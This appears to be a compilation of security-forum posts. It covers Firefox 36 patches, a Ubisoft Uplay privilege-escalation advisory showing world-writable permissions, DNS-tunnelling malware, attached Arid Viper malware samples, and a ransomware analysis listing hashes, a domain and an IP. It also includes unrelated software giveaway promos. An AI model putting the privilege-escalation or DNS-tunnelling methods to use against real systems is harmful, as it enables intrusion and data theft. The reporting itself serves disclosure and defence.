Mozilla has patched 16 security vulnerabilities in Firefox, including three critical flaws in the browser. One of the critical vulnerabilities patched with the release of Firefox 36 is a buffer overflow in the libstagefright library that can be exploitable under some circumstances. “Security researcher Pantrombka reported a buffer overflow in the libstagefright library during video playback when certain invalid MP4 video files led to the allocation of a buffer that was too small for the content. This led to a potentially exploitable crash,” the Mozilla advisory says. Among the other critical bugs patched in this release is a use-after-free vulnerability in the indexdDB component of the browser. “Security researcher Paul Bandha used the used the Address Sanitizer tool to discover a use-after-free vulnerability when running specific web content with IndexedDB to create an index. This leads to a potentially exploitable crash,” Mozilla said in its advisory. Firefox 36 also includes patches for a variety of memory safety vulnerabilities. The new release also includes fixes for a number of high-risk vulnerabilities, one of which affects the Mozilla updater function in the browser. The bug could let an attacker load malicious files. “Security researcher Holger Fuhrmannek reported that when the Mozilla updater is run directly, the updater will load binary DLL format files from the local working directory or from the Windows temporary directories. This occurs when it is run without the Mozilla Maintenance Service on Windows systems. This allowed for possibly malicious DLL files to execute with elevated privileges if a user agrees when a User Account Control (UAC) prompt from Windows is displayed,” the advisory says. The new browser also includes fixes for a handful of other medium and low-risk security bugs. Source

Summary: 1. Thanks for the sample file(s) 2. First view 3. Second view 4. More Read more: http://dl.packetstormsecurity.net/papers/virus/fakeav-downloader-analysis.pdf

Ubisoft Uplay 5.0 Insecure File Permissions Local Privilege Escalation Vendor: Ubisoft Entertainment S.A. Product web page: http://www.ubi.com Affected version: 5.0.0.3914 (PC) Summary: Uplay is a digital distribution, digital rights management, multiplayer and communications service created by Ubisoft to provide an experience similar to the achievements/trophies offered by various other game companies. - Uplay PC is a desktop client which replaces individual game launchers previously used for Ubisoft games. With Uplay PC, you have all your Uplay enabled games and Uplay services in the same place and you get access to a whole new set of features for your PC games. Desc: Uplay for PC suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Users' group, making the entire directory 'Ubisoft Game Launcher' and its files and sub-dirs world-writable. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5230 Advisory URL: [url]http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5230.php[/url] Vendor: [url]http://forums.ubi.com/forumdisplay.php/513-Uplay[/url] 19.02.2015 -- C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>cacls Uplay.exe C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\Uplay.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F test-PC\yousir:(ID)F C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher> source

PowerISO is a powerful CD / DVD / BD disc image file processing tool that allows you to open, extract, burn, create, edit, compress, encrypt, split and convert ISO files, and mount ISO files with internal virtual drive. It can process almost all CD / DVD / BD disc image files (ISO, BIN, NRG, CDI, DAA, and so on). PowerISO provides an all-in-one solution for disc image management needs. Free PowerISO (100% discount) Promotia se termina in 15h.

Product Description Get organized automatically Don’t spend time hunting down and organizing your files manually! Ashampoo Media Sync scans, identifies and organizes your media for you into categories (Documents, Music, Pictures, Video) – automatically. Files instantly organized No more file chaos! Just plug in your device. MediaSync will do the rest! Setting up takes only seconds Select input location. Select output location. Select file types. Done! Compatible with all autoplay-enabled devices CDs, DVDs, flash drives, smartphones, digital cameras and more. You name it, MediaSync supports it! The application consists of three main steps which you have to follow in order to sort your files. The first enables you to choose the source folder and the file category you want to sync (images, music, videos, documents), the second allows you to select the destination path and the third simply gives the all clear signal for the entire process. Ashampoo Media Sync can be used to synchronize content between mobile phones, tablets, external drives and so on, which makes it handy for scenarios in which you made a mess of things by copying stuff to the aforementioned devices without giving too much thought to sorting. Features: – Syncing happens in the background – Folder structures are preserved – File types are automatically recognized, files get organized into four categories (Documents, Music, Pictures, Video) – All auto-play-enabled devices are supported (CD, DVD, flash drives, smartphones, digital cameras and more) With Ashampoo Media Sync, organizing files is as easy as 1, 2, 3! 1. Select input location 2. Select output location 3. Select file types Ashampoo Media Sync will scan, identify and organize your media into categories for you (Documents, Music, Pictures, Video) – automatically, every time. -> Download <-Deal Expires in: EXPIRED!

Arid Viper: Gaza vs Israel Cyber Conflict http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-arid-viper.pdf Dubbed TROJ_STRPADT and TROJ_STRPSP by Trend Micro. All files mentioned in whitepaper attached. Arid_Viper_2.zip Arid_Viper_1.zip Source

CANCUN–Attackers have long used distributed denial of service attacks to knock domain-name servers offline but over the last several months malware creators have taken to using DNS requests to tunnel stolen data. Jaime Blasco, vice president and chief scientist at AlienVault, showed a handful of real malware samples that are using this technique at the Kaspersky Lab Security Analyst Summit Tuesday. Blasco, who’s identified suspicious domains before, took the crowd through the motions by discussing some tools to use: NSTX, OzymanDNS, Iodine and perhaps the best known, DNScat. The apps allow users to upload files, run shells, and powershell scripts to download other payloads to use within attacks. For the attack, Blasco described how there has to be an upstream channel which has a fully qualified domain name (FQDN) that has a minimum label length of 63 octets and a maximum domain length of 255 octets. The downstream channel can store a handful of different files in the: TXT records, CNAME records, NULL records and on occasion AAAA records. As part of an experiment Blasco and company found 50 million files that contained traffic, threw it into a parser and found that many malware samples store a URL in a TXT file and tell it which piece of spyware or malware to deploy. “There’s a bunch of software that are using DNS in a weird way,” Blasco said. One of the types of malware they found, FeederBot, was using base64 to encode and had an RC4 encrypted payload. Others used base64 and XOR. Blasco also stumbled upon FrameworkPOS, a fairly recent POS malware variant that was curiously spotted using DNS, although he believes the creators were either testing it out to allow DNS or had access to a company that used it. Morto, a worm that’s been around for a while and PlugX, a remote administration tool that’s existed in some incarnation since 2008, but has been making a return as of late, also turned up. Blasco said that since outbound DNS is usually allowed on corporate networks, many attackers have used it and avoided detection with a simple network protector like MyDLP. Anomalies in DNS traffic, like large content in TXT or NULL records, or a spike in DNS queries, or queries with long domains and subdomains are signs that something fishy might be afoot with a system’s DNS requests, he said. Source

Open source SWF player promises alternative to Adobe's endless security horror In November 2012 the Mozilla Foundation announced “Project Shumway”, an effort to create a “web-native runtime implementation of the SWF file format.” Two-and-a-bit years, and a colossal number of Flash bugs later, Shumway has achieved an important milestone by appearing in a Firefox nightly, a step that suggests it's getting closer to inclusion in the browser. Shumway's been available as a plugin for some time, and appears entirely capable of handling the SWF files. Few average users know of Shumway's existence, never mind seek it out. So the inclusion of the software in Firefox's nightlies will give it greater exposure. For now the code can only play certain videos hosted on Amazon.com, but developers intend to expand the list of sites from which Shumway will play SWF files. For now, Shumway-in-Firefox-nightlies works only on Windows Vista or later versions of Windows, and OSX. But expanded support is promised. When it arrives in a full version of Firefox, it will mean that about 15.1 per cent of all web surfing won't need Flash (based on W3counter market share data). Flash is a security nightmare that we recently suggested deserves to rot in an unmarked grave. Mozilla looks to be giving it a welcome shove in just that direction. Source

The blog post of today is a bit different than usual, as you can read the full post on the Panda Security blog. Read it here: Yet another ransomware variant In this post I'm simply adding some additional information and repeating the most important points. So, there's yet another ransomware variant on the loose. You may call this one Chuingam (chewing gum?) ransomware or Xwin ransomware - pointing to respectively the file with this string 'Chuingam' dropped, or in the latter case the folder on C:\ it creates. Or just another (skiddie) Generic Ransomware. In the blog post above, I discuss the methodology to encrypt files it uses and how it creates your own personal key, as well as the ransom message and how to recover files (if you're lucky & fast enough). pgp.exe (PGP) is used to generate the public RSA key. Since pgp.exe requires the RAR password, this is temporarily stored in the file "filepas.tmp" - which is overwritten and deleted, so no chance to recover this file. As a note; it will (try to) encrypt any and all files with the following extensions: jpg, jpeg, doc, txt, pdf, tif, dbf, eps, psd, cdr, tst, MBD, xml, xls, dwg, mdf, mdb, zip, rar, cdx, docx, wps, rtf, 1CD, 4db, 4dd, adp, ADP, xld, wdb, str, pdm, itdb, pst, ptx, dxg, ppt, pptx If you've been infected with this ransomware, best thing to do is to either restore from a backup or try to restore previous files (also known as shadow copies). For additional information in regards to this specific ransomware, refer to: Yet another ransomware variant For any further background information on ransomware or further prevention & disinfection advice, I refer to my Q&A on ransomware. IOCs Hashes (SHA1) 88039ecb68749ea7d713e4cf9950ffb2947f7683 7e1dd704684f01530307f81bbdc15fe266ffd8db Domains/IPs corplawersp.com 5.63.154.90 Source